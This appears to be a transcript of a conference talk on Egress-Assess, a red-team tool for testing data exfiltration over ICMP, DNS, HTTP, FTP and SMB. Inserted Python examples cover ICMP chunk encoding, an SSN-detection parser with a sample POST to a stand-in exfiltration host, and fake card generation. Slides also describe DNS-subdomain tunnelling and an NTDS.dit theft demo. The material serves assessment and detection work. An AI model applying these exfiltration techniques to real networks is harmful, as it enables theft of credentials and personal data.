
Egress-Assess and Owning Data Exfiltration

This talk discusses how Egress-Assess can be used to help attackers and defenders learn how to exfiltrate data outside of their network over a variety of protocols, describes how data is exfiltrated over different supported protocols, and demonstrates the weaponization of the tool!

1. Egress-Assess and Owning Data Exfiltration
   Christopher Truncer & Stephan Borosh
2. Who We Are
   ● Christopher Truncer (@ChrisTruncer)
     ○ Veil Framework developer, Florida State Seminole
   ● Steve Borosh (@424f424f)
     ○ U.S. Army Infantry combat veteran, bug hunter
   ● Red teamers, pen testers, and security researchers for Veris Group's Adaptive Threat Division
3. What's this talk about?
   ● Data exfiltration today
     ○ Motivations and goals
   ● Egress-Assess
     ○ State of the framework
     ○ Technical discussion of tunneling protocols
     ○ PowerShell component
     ○ Developing new modules
   ● Tempt the demo gods
4. Modern Day Ownage (news photo slide)
   http://www.ozarksfirst.com/media/lib/184/2/1/c/21c76ea6-2da0-4287-90ea-1a156ec78d14/Story.jpg
   http://i0.wp.com/static.bangordailynews.com/wp-content/blogs.dir/254/files/2015/02/anthemHACKED-450x338.jpg?quality=90&w=588
5. Moar Ownage (news photo slide)
   http://epmgaa.media.lionheartdms.com/img/photos/2014/01/13/Target_t750x550.jpg?626c74b6d570df44fd02ecca30244159e005ff34
   http://cbsnews2.cbsistatic.com/hub/i/r/2014/10/03/e4f01ebf-2679-4336-93fc-010cbf978d1d/thumbnail/940x470/1f6caf32404b9d045f81ceb9015694f9/en100314mason286601640x360.jpg
6. What's the target?
   ● Home Depot
     ○ Credit cards and e-mail addresses
   ● Anthem
     ○ SSNs, names, addresses, income... everything
   ● Target
     ○ Credit cards, names, e-mails, phone numbers
   ● JP Morgan
     ○ Customer account data
7. Attackers don't just target this... (image slide)
   http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/041514_1356_MurderingDe30.png
8. What's the point?
   ● End goal: money/data
     ○ Not disrupt, deny, degrade, or destroy (maybe deceive)
     ○ Not just shells anymore
     ○ Data: grab it, get it out
9. ...they target this
10. Assessment Lifecycle
11. Attacker C2 Comms
12. Tradecraft Evolution
   ● Pen tests traditionally exploit vulnerabilities
     ○ Find and exploit vulnerabilities
     ○ Assess security at a point in time
   ● Why not add exfiltration testing as well?
     ○ Attackers DO this, so why not help prepare our customers?
     ○ Let's emulate our threats
13. Our Solution
14. What does it do?
   ● Standard client/server model
   ● Simulates data exfiltration
     ○ Faux social security numbers or credit card numbers
     ○ And now real files :)
   ● Exfils over multiple protocols
15. Project Goals
   ● Fast to set up
   ● Minimal (if any) configuration required to work
   ● Lightweight, with no excessive dependencies
   ● Exfiltrate data over different protocols
   ● Modular framework that allows easy expansion of capabilities
16. Project Goals
   ● Store all data/files transferred as proof of transfer
     ○ Stored in a specific directory
     ○ Time and date stamped for correlation with blue team logs
   ● Demonstrate different options for data exfiltration and help test blue team detection capabilities
17. Tunneling Protocols
18. Supported Tunneling Protocols
   ● Protocols merged into Egress-Assess:
   ● ICMP
   ● SMB
   ● DNS
   ● DNS_Resolved
   ● HTTP
   ● HTTPS
   ● FTP
   ● SFTP
19. FTP and SFTP
   ● Generates faux data and writes it to disk, or transfers a file specified by the user
   ● Creates an FTP or SFTP connection to the server and transfers the file
   ● If faux data was used, the local file is deleted afterwards
20. FTP Transfer
21. ICMP
   ● Takes advantage of ICMP type 8 (echo request)
     ○ The protocol lets the sender choose the payload carried in the echo request
   ● Splits data into 1100-byte chunks
   ● Base64 encodes each chunk
   ● Uses the encoded chunk as the echo payload
22. ICMP Transfer
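The ICMP module's packet layout, as an added example that is not Egress-Assess's own code: it builds type 8 echo requests whose payload is one base64 chunk, uses the ICMP identifier and sequence fields to reorder chunks on receipt, and computes the checksum a real sender must get right or the receiving stack drops the packet. The identifier value, the use of the sequence field for chunk ordering, and the detection heuristic at the end are assumptions of mine, not details from the talk. No raw socket is opened; the same bytes would be written to a SOCK_RAW/IPPROTO_ICMP socket on the client.

```python
import base64
import binascii
import struct

ICMP_ECHO_REQUEST = 8
CHUNK_SIZE = 1100       # raw bytes per chunk, per the slide (base64 grows it to 1468 payload bytes)
EXFIL_IDENT = 0x1337    # assumed: an identifier both ends agree on, like a ping process id


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over header + payload (returns 0 when run over a good packet)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    """Type 8 / code 0 header with a computed checksum, followed by the caller-chosen payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_echo_request(packet: bytes):
    """Return (ident, seq, payload); raise on anything that is not an intact echo request."""
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_type != ICMP_ECHO_REQUEST:
        raise ValueError("not an ICMP echo request")
    if icmp_checksum(packet) != 0:
        raise ValueError("ICMP checksum mismatch")
    return ident, seq, packet[8:]


def encode_for_exfil(data: bytes, ident: int = EXFIL_IDENT, chunk_size: int = CHUNK_SIZE) -> list:
    """Client side: split, base64 each chunk, wrap it in an echo request numbered by sequence."""
    packets = []
    for seq, off in enumerate(range(0, len(data), chunk_size)):
        chunk = base64.b64encode(data[off:off + chunk_size])
        packets.append(build_echo_request(ident, seq & 0xFFFF, chunk))
    return packets


def decode_from_packets(packets, ident: int = EXFIL_IDENT) -> bytes:
    """Server side: keep packets for our identifier, reorder by sequence number, decode, join."""
    chunks = {}
    for pkt in packets:
        pkt_ident, seq, payload = parse_echo_request(pkt)
        if pkt_ident != ident:
            continue            # somebody else's ping
        chunks[seq] = base64.b64decode(payload)
    return b"".join(chunks[seq] for seq in sorted(chunks))


def is_suspicious_echo(packet: bytes, max_normal_payload: int = 64) -> bool:
    """Defender heuristic: an echo request much larger than a default ping whose payload is valid base64."""
    try:
        _ident, _seq, payload = parse_echo_request(packet)
    except ValueError:
        return False
    if len(payload) <= max_normal_payload:
        return False
    try:
        base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


if __name__ == "__main__":
    secret = b"SSN 512-34-1001\n" * 200            # constructed sample, 3200 bytes
    packets = encode_for_exfil(secret)
    print(len(packets), "echo requests of", len(packets[0]), "bytes")
    assert decode_from_packets(packets[::-1]) == secret
    print("flagged:", sum(is_suspicious_echo(p) for p in packets), "of", len(packets))
```

1100 raw bytes become 1468 base64 bytes; with the 8-byte ICMP header and a 20-byte IPv4 header that is 1496 bytes, just inside a 1500-byte Ethernet MTU, so each chunk travels unfragmented. The same size is the detection hook: a default ping carries 56 bytes of payload, so echo requests carrying over a kilobyte of printable base64 stand out in flow data or a capture even though nothing about them violates the protocol.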
23. DNS (Direct)
   ● Uses DNS TXT records
     ○ Max 255 bytes per TXT string
   ● Split data into chunks, base64 encode each chunk, send the packets directly to the Egress-Assess server
   ● Multiple limitations when working with DNS
     ○ Size restrictions, UDP, etc.
       ■ We'd tell a joke, but you might not get it :)
24. DNS (Direct) Transfer
25. Direct Comms Woes
   ● The other protocol modules work well, but fail when a proxy is required
   ● Other tools have shown that DNS can be used as a communications channel
     ○ Cobalt Strike's Beacon, DNS tunnelling projects (dnscat), etc.
     ○ Began researching different methods to exfil data via DNS
26. Why Use DNS?
   ● "But we don't allow port 53 out!"
   ● Locked-down environments can have proxies
   ● How many people inspect DNS?
     ○ How many people only resolve certain domains?
     ○ Can you block protocol-compliant C2 comms or data exfiltration attempts?
   ● The customer's own DNS server FTW!
27. DNS (Resolved)
   ● Resolves the local system's nameserver
   ● Sends a request to the system/network nameserver
     ○ <base64encodeddata>.subdomain.domain.com
   ● Server listens for incoming DNS A record requests
     ○ Grabs the record being requested, decodes it, and writes the data to disk
28. http://blog.cobaltstrike.com/2013/06/20/thatll-never-work-we-dont-allow-port-53-out/
29. DNS Resolved Setup
   ● Create a DNS A record for your final destination (the Egress-Assess server)
   ● Create an NS record for the subdomain, pointing at that A record
   https://www.christophertruncer.com/exfiltrate-data-via-dns-with-egress-assess/
30. DNS (Direct) Transfer
31. More DNS Woes
32. https://docs.google.com/presentation/d/1HfXVJyXElzBshZ9SYNjBwJf_4MBaho6UcATTFwApfXw/preview?sle=true&slide=id.g2d0184395_097
33. https://docs.google.com/presentation/d/1HfXVJyXElzBshZ9SYNjBwJf_4MBaho6UcATTFwApfXw/preview?sle=true&slide=id.g34d85052a_00
34. https://docs.google.com/presentation/d/1HfXVJyXElzBshZ9SYNjBwJf_4MBaho6UcATTFwApfXw/preview?sle=true&slide=id.g34d85052a_00
35. DNS Info
   ● The limitations of DNS lead to problems when transferring files
     ○ Faux data: no need to preserve order or 100% integrity
     ○ Binary files: this is a problem
   ● Currently working on essentially TCP over UDP for DNS transfers
36. PowerShell Client
37. PowerShell all the things
   ● Same client modules as the Python client
   ● Simulate attackers operating from Windows systems
   ● Domain proxy support
   ● Deployable through Beacon, Meterpreter, etc.
38. Get-Help
39. Beacon Deployment
40. Beacon HTTP SSN Receive
   ● ./Egress-Assess.py --server http
   ● Data saved in Egress-Assess/data/(timestamp)web_data.txt
41. Beacon HTTP SSN Transfer
42. HTTP Snort Capture
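For the HTTP transfer and Snort capture slides, an added defender-side example that is not from the talk or the project: a small parser for an outbound POST, an SSN matcher that discards values the Social Security Administration never issues, and an alert rule that fires on volume rather than on a single hit. The sample request at the bottom is constructed; the `data=` form field and the `/upload` path are assumptions, since the page does not show the exact request the HTTP module sends.

```python
import re
from urllib.parse import unquote_plus

# 3-2-4 digits with dashes, not embedded in a longer digit run
SSN_RE = re.compile(r"(?<!\d)(\d{3})-(\d{2})-(\d{4})(?!\d)")


def is_plausible_ssn(area: str, group: str, serial: str) -> bool:
    """Reject values the SSA never issues: area 000/666/900-999, group 00, serial 0000."""
    a = int(area)
    if a == 0 or a == 666 or a >= 900:
        return False
    return int(group) != 0 and int(serial) != 0


def find_ssns(text: str) -> list:
    return [m.group(0) for m in SSN_RE.finditer(text) if is_plausible_ssn(*m.groups())]


def split_http_request(raw: bytes):
    """Minimal request parser: (request line, lowercase header dict, body bytes)."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _sep, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body


def should_alert(raw: bytes, threshold: int = 5):
    """Alert when an outbound POST carries at least `threshold` plausible SSNs; returns (alert, count)."""
    request_line, headers, body = split_http_request(raw)
    if not request_line.startswith("POST "):
        return False, 0
    text = body.decode("latin-1")
    if "application/x-www-form-urlencoded" in headers.get("content-type", ""):
        text = unquote_plus(text)     # percent-encoded newlines or dashes would otherwise hide hits
    hits = find_ssns(text)
    return len(hits) >= threshold, len(hits)


# Constructed sample shaped like a form POST of faux SSNs; not a capture of Egress-Assess traffic.
_VALID = ["512-34-1001", "219-55-0042", "078-05-1120", "345-67-8901", "123-45-6789", "431-22-9087"]
_INVALID = ["000-12-3456", "666-01-2345", "901-11-2222", "123-00-4567"]
_BODY = "data=" + "%0A".join(_VALID + _INVALID)
SAMPLE_EXFIL_POST = (
    "POST /upload HTTP/1.1\r\n"
    "Host: exfil.example.net\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(_BODY)}\r\n"
    "\r\n" + _BODY
).encode("latin-1")
SAMPLE_BENIGN_GET = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"

if __name__ == "__main__":
    print("exfil POST:", should_alert(SAMPLE_EXFIL_POST))
    print("benign GET:", should_alert(SAMPLE_BENIGN_GET))
```

Snort's sensitive-data preprocessor implements the same idea in the engine with `sd_pattern` rule options such as `us_social` and `credit_card` plus a per-session count, which is what the capture on slide 42 exercises. The count threshold is the important part: a single nine-digit match is noise on most networks, while a request carrying dozens of them is exactly what the SSN module produces. Note that the check only sees plaintext, so the HTTPS module defeats it unless the proxy terminates TLS.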
43. Weaponization: NTDS.dit
44. Setup for SMB Delivery
   ● ./Egress-Assess.py --server SMB
   ● Shared as //host/data (anonymous read/write)
   ● Data saved in Egress-Assess/data/
45. Delivery Via SMB
46. SMB NTDS.dit Receive
47. Module Development
48. Protocol Modules
   ● Used to create client and server modules for Egress-Assess
   ● The transport mechanism for the generated (or real) data to exfil
   ● Eight different modules currently
     ○ HTTP, HTTPS, FTP, SFTP, SMTP, ICMP, DNS, DNS_Resolved
49. Client Protocol Modules
   ● A single "Protocol" Python class
   ● __init__ method
     ○ All it needs is a name
     ○ Has access to all CLI options (for username, password, etc.)
   ● transmit method
     ○ The data to be exfiltrated is passed in, and the method transfers it
50. Datatype Modules
   ● Modules which create the data to be exfiltrated by the framework
   ● Currently there are two generators
     ○ Social Security Numbers
     ○ Credit Card Numbers
   ● But any sort of data can be generated by Egress-Assess and used for exfil
51. Datatype Module
   ● A single "Datatype" Python class
   ● __init__ method
     ○ Give your module a name, description, and the "type" of data generated
     ○ All CLI options are passed in to this method
   ● generate_data method
     ○ Called to generate and return the data that is to be transferred
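An added example of a Datatype module written against the contract on slides 50 and 51 (name, description and data type set in __init__, the CLI options passed in, generate_data returning the payload). It is not a module shipped with Egress-Assess, and the exact attribute names, the stand-in CLI object and its record_count and seed options are assumptions. It generates card numbers that pass the Luhn check, which matters because most DLP and IDS card-number rules validate Luhn before alerting, so faux data that fails it never actually tests the control.

```python
import random


class FakeCliOptions:
    """Stand-in for the parsed command-line options Egress-Assess hands to a module (assumed shape)."""
    def __init__(self, record_count: int = 100, seed=None):
        self.record_count = record_count   # hypothetical option; the real CLI sizes output differently
        self.seed = seed                   # hypothetical option, for reproducible test data


def luhn_check_digit(partial: str) -> str:
    """Check digit that makes `partial + digit` pass the Luhn test (ISO/IEC 7812)."""
    total = 0
    for i, ch in enumerate(reversed(partial)):
        d = int(ch)
        if i % 2 == 0:          # every second digit from the right, starting next to the check digit
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(number: str) -> bool:
    """What a DLP rule does before it believes a 13-19 digit string is a card number."""
    digits = [int(c) for c in number if c.isdigit()]
    if not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


class Datatype:
    """Faux credit-card generator following the slide's contract: name/description/datatype set in
    __init__, the CLI options passed in, and generate_data() returning the payload to transmit."""

    def __init__(self, cli_object):
        self.name = "Faux Credit Cards (Luhn-valid)"
        self.description = "16-digit card numbers that pass the Luhn check, for exfil simulation"
        self.datatype = "credit_card"
        self.record_count = getattr(cli_object, "record_count", 100)
        self.rng = random.Random(getattr(cli_object, "seed", None))

    def _one_card(self) -> str:
        # leading 4, then 14 random digits, then the Luhn check digit: 16 digits in total
        body = "4" + "".join(str(self.rng.randrange(10)) for _ in range(14))
        return body + luhn_check_digit(body)

    def generate_data(self) -> str:
        return "\n".join(self._one_card() for _ in range(self.record_count))


if __name__ == "__main__":
    module = Datatype(FakeCliOptions(record_count=5, seed=7))
    print(module.name, "->", module.datatype)
    print(module.generate_data())
```

Seeding the generator is worth keeping even in a real module: the same faux records on every run let the blue team diff what the server wrote to Egress-Assess/data/ against what their DLP logged, record by record.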
52. Shameless Hiring Plug
   ● We're growing!
   ● Want to research cool stuff?
   ● Want to work with 13 OSCPs and 4 OSCEs?
   ● Benefits: research budget, training budget
   ● Hit us up to join Veris Group's Adaptive Threat Division!
53. ?
   ● GitHub
     ○ https://github.com/ChrisTruncer/Egress-Assess
   ● Chris Truncer
     ○ @ChrisTruncer
     ○ CTruncer@christophertruncer.com
   ● Steve Borosh
     ○ @424f424f
     ○ steveborosh@rvrsh3ll.net
